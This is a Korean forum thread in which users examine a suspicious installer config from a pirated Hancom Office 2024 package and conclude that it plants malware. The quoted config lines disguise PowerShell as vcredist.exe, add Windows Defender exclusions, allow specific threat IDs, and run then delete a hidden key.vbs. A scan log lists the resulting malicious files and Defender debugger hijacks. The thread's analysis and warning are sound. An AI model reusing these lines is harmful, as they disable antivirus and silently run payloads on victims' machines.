소프트웨어 요즘 나도는 한컴2024 설정파일
2024.01.07 14:50
ExtRun0=Install\Install_UI\lo\HOffice130.exe
ExtRun1=Install\Install_UI\Logo_Copy.bat
ExtRun2=Install\Install_UI\lo\HOffice130.exe
ExtRun3=Install\Install_UI\lo\HOffice130.exe
ExtRun4=Install\HOffice2024Update_20231109.exe
ExtRun5=Install\Install_UI\lo\HOffice130.exe
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
여기에서
ExtRun1=Install\Install_UI\Logo_Copy.bat
ExtRun2=Install\Install_UI\lo\HOffice130.exe
ExtRun3=Install\Install_UI\lo\HOffice130.exe
ExtRun4=Install\HOffice2024Update_20231109.exe
ExtRun5=Install\Install_UI\lo\HOffice130.exe
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
이부분은 전부 없어도 되지 않을까요?
특히
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
는 상당히 찝찝해 보입니다. keygen key.vbs filldelete Install\Install_UI\lo\key.vbs ThreatIDDefaultAction 등등...
ExtRun0=Install\Install_UI\lo\HOffice130.exe 만 남기고
LevelOption=3 으로 전부 선택해서 설치해보면
한글만 설치되더군요. 한셀 한쇼 등등은 설치가 안됩니다.
그리고 설치가 끝나면
희안하게
nircmd..com 메시지가 나타나는군요. 한글설치하면서 이제껏 처음보는 메시지입니다.
먼가 파일변조가 있었을 확률이 높아보이네요
클린설치할 수 있는 설치본 원본만 어디서 못 구할까요
유포되고 있는 h2024.zip 파일은 상당히 찝찝하네요
댓글 [6]
-
젠투 2024.01.07 15:02 -
늑대아니에요! 2024.01.07 15:11
ExtRun0=Install\Install_UI\lo\HOffice130.exe
이부분도 삭제하니까
nircmd메시지는 나타나지 않는군요.
악성파일을 심은후 [PostInstall] 에서 먼가 장난질이 있는거 같습니다.
-
늑대아니에요! 2024.01.07 16:47
mzk 검색하니
■ 악성 및 유해 가능 파일 제거 :
"C:\Windows\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTask" (격리/제거 성공 [Active Scan])
"C:\Windows\svchost.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\KB5019959.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\KB5026372.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\Google\GoogleUpdate.exe" (격리/제거 성공)
"C:\Users\Administrator\AppData\Roaming\Google\Libs\WR64.sys" (격리/제거 성공)
■ 악성 및 유해 가능 폴더 제거 :
"C:\Users\Administrator\AppData\Roaming\Google\Libs" (격리/제거 성공)
■ 악성 및 유해 가능 <HKEY_LOCAL_MACHINE> 레지스트리 제거 :
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe : Debugger" (격리/제거 성공)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe : Debugger" (격리/제거 성공)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTask" (격리/제거 성공 [Active Scan])
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{495CD511-03B9-4F0A-8CC6-F2C248561AE9}" (격리/제거 성공 [Active Scan])
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{495CD511-03B9-4F0A-8CC6-F2C248561AE9}" (격리/제거 성공 [Active Scan])
흠...
-
위라이즈 2024.01.07 17:31
nircmd.exe 자체는 악성 프로그램은 아닙니다.
단지 CLI 툴로 이것저것 유용한 기능이 있지만, 악의적으로 사용한다면 사용자 모르게 무언가를 실행할 수도 있겠네요.
역시 중간에 7z.exe 도 보이는데, 어디 파일에서 압축을 풀고 vbs 파일 등으로 사용자 모르게 무언가를 할 수도 있겠네요.
게임 인스톨러 등에서는 압축 풀기 위해서 7z.exe를 사용하는 경우도 있긴 하나, 한컴에서는 굳이 중간에 nircmd.exe를 호출하거나 7z.exe을 이용해서 압축을 풀거나 vbs 파일 등을 이용해서 설치할 껀덕지가 있을 것 같진 않은데, 찜찜하면 안 쓰는게 맞습니다.
-
DarknessAngel 2024.01.07 18:13
원본은 시리얼만 있으면 얼마든지 구할 수 있습니다
-
늑대아니에요! 2024.01.07 18:20
https://windowsforum.kr/index.php?mid=data&page=5&document_srl=20291758
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_Hwp.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_Home.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_ESD.exe
idm 으로 다운받은 후 실행해보니 한컴 원본 설치파일이 생기네요.
감사합니다.
번호 | 제목 | 글쓴이 | 조회 | 등록일 |
---|---|---|---|---|
[공지] | 질문과 답변 게시판 이용간 유의사항 | gooddew | - | - |
12333 | 소프트웨어| 해킹/보안쪽으로 잘 아시는 분들 요거 진위 여부좀 부탁드... [2] | ever | 1734 | 02-04 |
12332 | 소프트웨어| 고스트 15에 관한 질문입니다 [2] | 회탈리카 | 1734 | 03-30 |
12331 | 소프트웨어| 프로그램설치 프로그램에서는 .net을 설치하라는데 [5] | brucex | 1734 | 12-21 |
12330 | 소프트웨어| utorrent 배포 상태가 풀립니다. [2] | 카스타드 | 1734 | 12-26 |
12329 | 소프트웨어| 프린터에 잉크가 있음에도 인쇄시 백지상태도 인쇄 됩니다! [5] | 철이코알라 | 1734 | 03-11 |
» | 소프트웨어| 요즘 나도는 한컴2024 설정파일 [6] | 늑대아니에 | 1734 | 01-07 |
12327 | 소프트웨어| 크롬에서의 글씨체 변경 [6] | 무명거사 | 1733 | 08-18 |
12326 | 소프트웨어| 크롬에서 캐시파일 저장 장소 변경 가능? [6] | 염감-2 | 1733 | 02-01 |
12325 | 소프트웨어| 크롬에서 저장된 탭들의 주소정보가 어디 저장되어있는지 ... [4] | 메리아 | 1732 | 09-26 |
12324 | 소프트웨어| VMware에서 최대 디스크 설정 시 디스크 크기!! [3] | 아폴로 | 1732 | 11-20 |
12323 | 소프트웨어| 윈도우7 네트워크 드라이버 설치? [4] | 맹물 | 1732 | 01-13 |
12322 | 소프트웨어| VMware Workstation 자꾸 먹통이 됩니다.ㅜㅠ [6] | 아모텐시아 | 1732 | 02-17 |
12321 | 소프트웨어| OnAir USB HDTV Creator-win8 x64 드라이버 [5] | dragonzion | 1732 | 07-14 |
12320 | 소프트웨어| photoshop에서 그림 크기 키을 때 [7] | brucex | 1732 | 01-12 |
12319 | 소프트웨어| 유료 Capture Progarm 추천 좀 ? [1] | 컴지존 | 1731 | 01-06 |
12318 | 소프트웨어| ps 파일 합치기 | 그냥그대로 | 1731 | 03-14 |
12317 | 소프트웨어| 페일문 질문입니다 [3] | 공피 | 1731 | 01-12 |
12316 | 소프트웨어| 동의보감을 찿고있습니다..... [2] | JWL | 1731 | 01-26 |
12315 | 소프트웨어| 사진용량 줄이는 프로그램 추천부탁드립니다 [2] | 뷰티블마인 | 1731 | 01-27 |
12314 | 소프트웨어| 7z 압축할때 암호 [3] | 뉙네임 | 1731 | 01-29 |
토렌트에 도는거 저 부분에 악성코드 삽입내용이라고 밝혀진지 오래됐습니다.
되도록이면 정품 사용하시길.
https://windowsforum.kr/free/20235156
정품키 구매하셨으면 바로 홈페이지에서 다운로드 가능하십니다.